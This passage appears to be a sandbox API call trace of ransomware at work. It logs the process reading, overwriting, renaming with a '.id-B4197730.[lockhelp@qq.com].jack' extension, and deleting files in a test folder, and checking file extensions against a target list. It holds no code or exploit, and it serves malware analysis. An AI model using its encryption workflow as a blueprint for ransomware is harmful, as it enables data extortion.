lpOverlapped=0x0) returned 1 [0197.916] WriteFile (in: hFile=0x424, lpBuffer=0x4229020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x355fc94, lpOverlapped=0x0 | out: lpBuffer=0x4229020*, lpNumberOfBytesWritten=0x355fc94*=0xea, lpOverlapped=0x0) returned 1 [0197.916] SetEndOfFile (hFile=0x424) returned 1 [0197.916] CloseHandle (hObject=0x424) returned 1 [0197.980] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x355fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.980] SetEndOfFile (hFile=0x418) returned 1 [0197.981] CloseHandle (hObject=0x418) returned 1 [0197.981] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate7.ico.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x80) returned 1 [0197.981] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate7.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate7.ico")) returned 1 [0197.983] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate7.ico") returned 42 [0197.983] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate7.ico") returned 42 [0197.983] lstrlenW (lpString=".doc") returned 4 [0197.983] lstrcmpiW (lpString1=".doc", lpString2=".ico") returned -1 [0197.983] lstrlenW (lpString=".docx") returned 5 [0197.983] lstrcmpiW (lpString1=".docx", lpString2="7.ico") returned -1 [0197.983] lstrlenW (lpString=".pdf") returned 4 [0197.983] lstrcmpiW (lpString1=".pdf", lpString2=".ico") returned 1 [0197.983] lstrlenW (lpString=".xls") returned 4 [0197.984] lstrcmpiW (lpString1=".xls", lpString2=".ico") returned 1 [0197.984] lstrlenW (lpString=".xlsx") returned 5 [0197.984] lstrcmpiW (lpString1=".xlsx", lpString2="7.ico") returned -1 [0197.984] lstrlenW (lpString=".ppt") returned 4 [0197.984] lstrcmpiW (lpString1=".ppt", lpString2=".ico") returned 1 [0197.984] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate7.ico") returned 42 [0197.984] lstrlenW (lpString=".zip") returned 4 [0197.984] lstrcmpiW (lpString1=".zip", lpString2=".ico") returned 1 [0197.984] lstrlenW (lpString=".rar") returned 4 [0197.984] lstrcmpiW (lpString1=".rar", lpString2=".ico") returned 1 [0197.984] lstrlenW (lpString=".bz2") returned 4 [0197.984] lstrcmpiW (lpString1=".bz2", lpString2=".ico") returned -1 [0197.984] lstrlenW (lpString=".7z") returned 3 [0197.984] lstrcmpiW (lpString1=".7z", lpString2="ico") returned -1 [0197.984] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate7.ico") returned 42 [0197.984] lstrlenW (lpString=".dbf") returned 4 [0197.984] lstrcmpiW (lpString1=".dbf", lpString2=".ico") returned -1 [0197.984] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate7.ico") returned 42 [0197.984] lstrlenW (lpString=".1cd") returned 4 [0197.984] lstrcmpiW (lpString1=".1cd", lpString2=".ico") returned -1 [0197.984] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate7.ico") returned 42 [0197.984] lstrlenW (lpString=".jpg") returned 4 [0197.984] lstrcmpiW (lpString1=".jpg", lpString2=".ico") returned 1 [0197.984] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate7.ico") returned 42 [0197.984] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate7.ico") returned 42 [0197.984] lstrlenW (lpString=".doc") returned 4 [0197.984] lstrcmpiW (lpString1=".doc", lpString2=".ico") returned -1 [0197.984] lstrlenW (lpString=".docx") returned 5 [0197.985] lstrcmpiW (lpString1=".docx", lpString2="7.ico") returned -1 [0197.985] lstrlenW (lpString=".pdf") returned 4 [0197.985] lstrcmpiW (lpString1=".pdf", lpString2=".ico") returned 1 [0197.985] lstrlenW (lpString=".xls") returned 4 [0197.985] lstrcmpiW (lpString1=".xls", lpString2=".ico") returned 1 [0197.985] lstrlenW (lpString=".xlsx") returned 5 [0197.985] lstrcmpiW (lpString1=".xlsx", lpString2="7.ico") returned -1 [0197.985] lstrlenW (lpString=".ppt") returned 4 [0197.985] lstrcmpiW (lpString1=".ppt", lpString2=".ico") returned 1 [0197.985] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate7.ico") returned 42 [0197.985] lstrlenW (lpString=".zip") returned 4 [0197.985] lstrcmpiW (lpString1=".zip", lpString2=".ico") returned 1 [0197.985] lstrlenW (lpString=".rar") returned 4 [0197.985] lstrcmpiW (lpString1=".rar", lpString2=".ico") returned 1 [0197.985] lstrlenW (lpString=".bz2") returned 4 [0197.985] lstrcmpiW (lpString1=".bz2", lpString2=".ico") returned -1 [0197.985] lstrlenW (lpString=".7z") returned 3 [0197.985] lstrcmpiW (lpString1=".7z", lpString2="ico") returned -1 [0197.985] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate7.ico") returned 42 [0197.985] lstrlenW (lpString=".dbf") returned 4 [0197.985] lstrcmpiW (lpString1=".dbf", lpString2=".ico") returned -1 [0197.985] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate7.ico") returned 42 [0197.985] lstrlenW (lpString=".1cd") returned 4 [0197.985] lstrcmpiW (lpString1=".1cd", lpString2=".ico") returned -1 [0197.985] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate7.ico") returned 42 [0197.985] lstrlenW (lpString=".jpg") returned 4 [0197.985] lstrcmpiW (lpString1=".jpg", lpString2=".ico") returned 1 [0197.986] lstrcmpiW (lpString1=".msi", lpString2=".jack") returned 1 [0197.986] lstrlenW (lpString="netfx_Core_x64.msi") returned 18 [0197.986] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\netfx_Core_x64.msi" (normalized: "c:\\588bce7c90097ed212\\netfx_core_x64.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x418 [0197.986] GetFileSizeEx (in: hFile=0x418, lpFileSize=0x355ff14 | out: lpFileSize=0x355ff14*=1901056) returned 1 [0197.986] CloseHandle (hObject=0x418) returned 1 [0197.987] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\netfx_Core_x64.msi" (normalized: "c:\\588bce7c90097ed212\\netfx_core_x64.msi")) returned 0x80 [0197.987] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\netfx_Core_x64.msi.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\netfx_core_x64.msi.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0197.987] MoveFileW (lpExistingFileName="C:\\588bce7c90097ed212\\netfx_Core_x64.msi" (normalized: "c:\\588bce7c90097ed212\\netfx_core_x64.msi"), lpNewFileName="C:\\588bce7c90097ed212\\netfx_Core_x64.msi.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\netfx_core_x64.msi.id-b4197730.[lockhelp@qq.com].jack")) returned 1 [0197.987] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\netfx_Core_x64.msi.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\netfx_core_x64.msi.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x418 [0197.987] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x355fc64 | out: lpNewFilePointer=0x0) returned 1 [0197.987] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x355fc24 | out: lpNewFilePointer=0x0) returned 1 [0197.988] ReadFile (in: hFile=0x418, lpBuffer=0x4229058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x355fc30, lpOverlapped=0x0 | out: lpBuffer=0x4229058*, lpNumberOfBytesRead=0x355fc30*=0x40000, lpOverlapped=0x0) returned 1 [0197.992] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x9ab55, lpNewFilePointer=0x0, dwMoveMethod=0x355fc24 | out: lpNewFilePointer=0x0) returned 1 [0197.992] ReadFile (in: hFile=0x418, lpBuffer=0x4269058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x355fc30, lpOverlapped=0x0 | out: lpBuffer=0x4269058*, lpNumberOfBytesRead=0x355fc30*=0x40000, lpOverlapped=0x0) returned 1 [0197.995] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x355fc64 | out: lpNewFilePointer=0xffffffff) returned 1 [0197.995] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x190200, lpNewFilePointer=0x0, dwMoveMethod=0x355fc24 | out: lpNewFilePointer=0x0) returned 1 [0197.995] ReadFile (in: hFile=0x418, lpBuffer=0x42a9058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x355fc30, lpOverlapped=0x0 | out: lpBuffer=0x42a9058*, lpNumberOfBytesRead=0x355fc30*=0x40000, lpOverlapped=0x0) returned 1 [0198.091] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x355fec0 | out: lpNewFilePointer=0x0) returned 1 [0198.091] WriteFile (in: hFile=0x418, lpBuffer=0x4229020*, nNumberOfBytesToWrite=0xc0110, lpNumberOfBytesWritten=0x355fca8, lpOverlapped=0x0 | out: lpBuffer=0x4229020*, lpNumberOfBytesWritten=0x355fca8*=0xc0110, lpOverlapped=0x0) returned 1 [0198.115] SetEndOfFile (hFile=0x418) returned 1 [0198.115] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x40000) returned 0x47b0050 [0198.119] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x355fc74 | out: lpNewFilePointer=0x0) returned 1 [0198.119] WriteFile (in: hFile=0x418, lpBuffer=0x47b0050*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x355fc80, lpOverlapped=0x0 | out: lpBuffer=0x47b0050*, lpNumberOfBytesWritten=0x355fc80*=0x40000, lpOverlapped=0x0) returned 1 [0198.121] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x9ab55, lpNewFilePointer=0x0, dwMoveMethod=0x355fc74 | out: lpNewFilePointer=0x0) returned 1 [0198.121] WriteFile (in: hFile=0x418, lpBuffer=0x47b0050*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x355fc80, lpOverlapped=0x0 | out: lpBuffer=0x47b0050*, lpNumberOfBytesWritten=0x355fc80*=0x40000, lpOverlapped=0x0) returned 1 [0198.478] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x190200, lpNewFilePointer=0x0, dwMoveMethod=0x355fc74 | out: lpNewFilePointer=0x0) returned 1 [0198.478] WriteFile (in: hFile=0x418, lpBuffer=0x47b0050*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x355fc80, lpOverlapped=0x0 | out: lpBuffer=0x47b0050*, lpNumberOfBytesWritten=0x355fc80*=0x40000, lpOverlapped=0x0) returned 1 [0198.481] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x47b0050 | out: hHeap=0x5e0000) returned 1 [0198.484] CloseHandle (hObject=0x418) returned 1 [0199.094] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\netfx_Core_x64.msi.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x80) returned 1 [0199.094] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Core_x64.msi") returned 40 [0199.094] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Core_x64.msi") returned 40 [0199.094] lstrlenW (lpString=".doc") returned 4 [0199.094] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0199.094] lstrlenW (lpString=".docx") returned 5 [0199.094] lstrcmpiW (lpString1=".docx", lpString2="4.msi") returned -1 [0199.094] lstrlenW (lpString=".pdf") returned 4 [0199.094] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0199.094] lstrlenW (lpString=".xls") returned 4 [0199.094] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0199.094] lstrlenW (lpString=".xlsx") returned 5 [0199.094] lstrcmpiW (lpString1=".xlsx", lpString2="4.msi") returned -1 [0199.095] lstrlenW (lpString=".ppt") returned 4 [0199.095] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0199.095] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Core_x64.msi") returned 40 [0199.095] lstrlenW (lpString=".zip") returned 4 [0199.095] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0199.095] lstrlenW (lpString=".rar") returned 4 [0199.095] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0199.095] lstrlenW (lpString=".bz2") returned 4 [0199.095] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0199.095] lstrlenW (lpString=".7z") returned 3 [0199.095] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0199.095] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Core_x64.msi") returned 40 [0199.095] lstrlenW (lpString=".dbf") returned 4 [0199.095] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0199.095] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Core_x64.msi") returned 40 [0199.095] lstrlenW (lpString=".1cd") returned 4 [0199.095] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0199.095] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Core_x64.msi") returned 40 [0199.095] lstrlenW (lpString=".jpg") returned 4 [0199.095] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0199.095] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Core_x64.msi") returned 40 [0199.095] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Core_x64.msi") returned 40 [0199.095] lstrlenW (lpString=".doc") returned 4 [0199.095] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0199.095] lstrlenW (lpString=".docx") returned 5 [0199.095] lstrcmpiW (lpString1=".docx", lpString2="4.msi") returned -1 [0199.095] lstrlenW (lpString=".pdf") returned 4 [0199.095] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0199.096] lstrlenW (lpString=".xls") returned 4 [0199.096] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0199.096] lstrlenW (lpString=".xlsx") returned 5 [0199.096] lstrcmpiW (lpString1=".xlsx", lpString2="4.msi") returned -1 [0199.096] lstrlenW (lpString=".ppt") returned 4 [0199.096] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0199.096] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Core_x64.msi") returned 40 [0199.096] lstrlenW (lpString=".zip") returned 4 [0199.096] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0199.096] lstrlenW (lpString=".rar") returned 4 [0199.096] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0199.096] lstrlenW (lpString=".bz2") returned 4 [0199.096] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0199.096] lstrlenW (lpString=".7z") returned 3 [0199.096] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0199.096] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Core_x64.msi") returned 40 [0199.096] lstrlenW (lpString=".dbf") returned 4 [0199.096] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0199.096] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Core_x64.msi") returned 40 [0199.096] lstrlenW (lpString=".1cd") returned 4 [0199.096] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0199.096] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Core_x64.msi") returned 40 [0199.096] lstrlenW (lpString=".jpg") returned 4 [0199.096] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0199.096] lstrcmpiW (lpString1=".msi", lpString2=".jack") returned 1 [0199.097] lstrlenW (lpString="netfx_Extended_x64.msi") returned 22 [0199.097] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\netfx_Extended_x64.msi" (normalized: "c:\\588bce7c90097ed212\\netfx_extended_x64.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f4 [0199.112] GetFileSizeEx (in: hFile=0x3f4, lpFileSize=0x355ff14 | out: lpFileSize=0x355ff14*=872448) returned 1 [0199.112] CloseHandle (hObject=0x3f4) returned 1 [0199.112] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\netfx_Extended_x64.msi" (normalized: "c:\\588bce7c90097ed212\\netfx_extended_x64.msi")) returned 0x80 [0199.112] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\netfx_Extended_x64.msi.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\netfx_extended_x64.msi.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0199.112] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\netfx_Extended_x64.msi" (normalized: "c:\\588bce7c90097ed212\\netfx_extended_x64.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f4 [0199.112] SetFilePointerEx (in: hFile=0x3f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x355fec0 | out: lpNewFilePointer=0x0) returned 1 [0199.112] SetFilePointerEx (in: hFile=0x3f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x355fec0 | out: lpNewFilePointer=0x0) returned 1 [0199.112] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\netfx_Extended_x64.msi.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\netfx_extended_x64.msi.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x418 [0199.113] GetLastError () returned 0x0 [0199.113] ReadFile (in: hFile=0x3f4, lpBuffer=0x4229020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x355fecc, lpOverlapped=0x0 | out: lpBuffer=0x4229020*, lpNumberOfBytesRead=0x355fecc*=0xd5000, lpOverlapped=0x0) returned 1 [0199.168] WriteFile (in: hFile=0x418, lpBuffer=0x4229020*, nNumberOfBytesToWrite=0xd5010, lpNumberOfBytesWritten=0x355fc94, lpOverlapped=0x0 | out: lpBuffer=0x4229020*, lpNumberOfBytesWritten=0x355fc94*=0xd5010, lpOverlapped=0x0) returned 1 [0199.597] ReadFile (in: hFile=0x3f4, lpBuffer=0x4229020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x355fecc, lpOverlapped=0x0 | out: lpBuffer=0x4229020*, lpNumberOfBytesRead=0x355fecc*=0x0, lpOverlapped=0x0) returned 1 [0199.597] WriteFile (in: hFile=0x418, lpBuffer=0x4229020*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x355fc94, lpOverlapped=0x0 | out: lpBuffer=0x4229020*, lpNumberOfBytesWritten=0x355fc94*=0x100, lpOverlapped=0x0) returned 1 [0199.597] SetEndOfFile (hFile=0x418) returned 1 [0199.597] CloseHandle (hObject=0x418) returned 1 [0199.962] SetFilePointerEx (in: hFile=0x3f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x355fec0 | out: lpNewFilePointer=0x0) returned 1 [0199.962] SetEndOfFile (hFile=0x3f4) returned 1 [0199.971] CloseHandle (hObject=0x3f4) returned 1 [0199.971] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\netfx_Extended_x64.msi.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x80) returned 1 [0199.972] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\netfx_Extended_x64.msi" (normalized: "c:\\588bce7c90097ed212\\netfx_extended_x64.msi")) returned 1 [0199.972] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Extended_x64.msi") returned 44 [0199.972] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Extended_x64.msi") returned 44 [0199.972] lstrlenW (lpString=".doc") returned 4 [0199.972] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0199.972] lstrlenW (lpString=".docx") returned 5 [0199.972] lstrcmpiW (lpString1=".docx", lpString2="4.msi") returned -1 [0199.972] lstrlenW (lpString=".pdf") returned 4 [0199.972] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0199.972] lstrlenW (lpString=".xls") returned 4 [0199.972] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0199.972] lstrlenW (lpString=".xlsx") returned 5 [0199.972] lstrcmpiW (lpString1=".xlsx", lpString2="4.msi") returned -1 [0199.972] lstrlenW (lpString=".ppt") returned 4 [0199.972] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0199.972] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Extended_x64.msi") returned 44 [0199.972] lstrlenW (lpString=".zip") returned 4 [0199.972] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0199.972] lstrlenW (lpString=".rar") returned 4 [0199.972] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0199.973] lstrlenW (lpString=".bz2") returned 4 [0199.973] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0199.973] lstrlenW (lpString=".7z") returned 3 [0199.973] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0199.973] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Extended_x64.msi") returned 44 [0199.973] lstrlenW (lpString=".dbf") returned 4 [0199.973] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0199.973] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Extended_x64.msi") returned 44 [0199.973] lstrlenW (lpString=".1cd") returned 4 [0199.973] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0199.973] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Extended_x64.msi") returned 44 [0199.973] lstrlenW (lpString=".jpg") returned 4 [0199.973] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0199.973] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Extended_x64.msi") returned 44 [0199.973] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Extended_x64.msi") returned 44 [0199.973] lstrlenW (lpString=".doc") returned 4 [0199.973] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0199.973] lstrlenW (lpString=".docx") returned 5 [0199.973] lstrcmpiW (lpString1=".docx", lpString2="4.msi") returned -1 [0199.973] lstrlenW (lpString=".pdf") returned 4 [0199.973] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0199.973] lstrlenW (lpString=".xls") returned 4 [0199.973] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0199.973] lstrlenW (lpString=".xlsx") returned 5 [0199.973] lstrcmpiW (lpString1=".xlsx", lpString2="4.msi") returned -1 [0199.973] lstrlenW (lpString=".ppt") returned 4 [0199.973] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0199.974] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Extended_x64.msi") returned 44 [0199.974] lstrlenW (lpString=".zip") returned 4 [0199.974] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0199.974] lstrlenW (lpString=".rar") returned 4 [0199.974] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0199.974] lstrlenW (lpString=".bz2") returned 4 [0199.974] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0199.974] lstrlenW (lpString=".7z") returned 3 [0199.974] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0199.974] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Extended_x64.msi") returned 44 [0199.974] lstrlenW (lpString=".dbf") returned 4 [0199.974] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0199.974] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Extended_x64.msi") returned 44 [0199.974] lstrlenW (lpString=".1cd") returned 4 [0199.974] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0199.974] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Extended_x64.msi") returned 44 [0199.974] lstrlenW (lpString=".jpg") returned 4 [0199.974] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0199.974] lstrcmpiW (lpString1=".dll", lpString2=".jack") returned -1 [0199.974] lstrlenW (lpString="SetupEngine.dll") returned 15 [0199.974] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\SetupEngine.dll" (normalized: "c:\\588bce7c90097ed212\\setupengine.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f4 [0199.975] GetFileSizeEx (in: hFile=0x3f4, lpFileSize=0x355ff14 | out: lpFileSize=0x355ff14*=807256) returned 1 [0199.975] CloseHandle (hObject=0x3f4) returned 1 [0199.975] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\SetupEngine.dll" (normalized: "c:\\588bce7c90097ed212\\setupengine.dll")) returned 0x80 [0199.975] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\SetupEngine.dll.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\setupengine.dll.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0199.975] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\SetupEngine.dll" (normalized: "c:\\588bce7c90097ed212\\setupengine.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f4 [0199.975] SetFilePointerEx (in: hFile=0x3f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x355fec0 | out: lpNewFilePointer=0x0) returned 1 [0199.975] SetFilePointerEx (in: hFile=0x3f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x355fec0 | out: lpNewFilePointer=0x0) returned 1 [0199.975] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\SetupEngine.dll.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\setupengine.dll.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x418 [0199.976] GetLastError () returned 0x0 [0199.976] ReadFile (in: hFile=0x3f4, lpBuffer=0x4229020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x355fecc, lpOverlapped=0x0 | out: lpBuffer=0x4229020*, lpNumberOfBytesRead=0x355fecc*=0xc5158, lpOverlapped=0x0) returned 1 [0199.995] WriteFile (in: hFile=0x418, lpBuffer=0x4229020*, nNumberOfBytesToWrite=0xc5160, lpNumberOfBytesWritten=0x355fc94, lpOverlapped=0x0 | out: lpBuffer=0x4229020*, lpNumberOfBytesWritten=0x355fc94*=0xc5160, lpOverlapped=0x0) returned 1 [0201.474] ReadFile (in: hFile=0x3f4, lpBuffer=0x4229020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x355fecc, lpOverlapped=0x0 | out: lpBuffer=0x4229020*, lpNumberOfBytesRead=0x355fecc*=0x0, lpOverlapped=0x0) returned 1 [0201.474] WriteFile (in: hFile=0x418, lpBuffer=0x4229020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x355fc94, lpOverlapped=0x0 | out: lpBuffer=0x4229020*, lpNumberOfBytesWritten=0x355fc94*=0xf2, lpOverlapped=0x0) returned 1 [0201.474] SetEndOfFile (hFile=0x418) returned 1 [0201.474] CloseHandle (hObject=0x418) returned 1 [0201.492] SetFilePointerEx (in: hFile=0x3f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x355fec0 | out: lpNewFilePointer=0x0) returned 1 [0201.492] SetEndOfFile (hFile=0x3f4) returned 1 [0201.514] CloseHandle (hObject=0x3f4) returned 1 [0201.514] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\SetupEngine.dll.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x80) returned 1 [0203.108] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\SetupEngine.dll" (normalized: "c:\\588bce7c90097ed212\\setupengine.dll")) returned 1 [0203.134] lstrlenW (lpString="C:\\588bce7c90097ed212\\SetupEngine.dll") returned 37 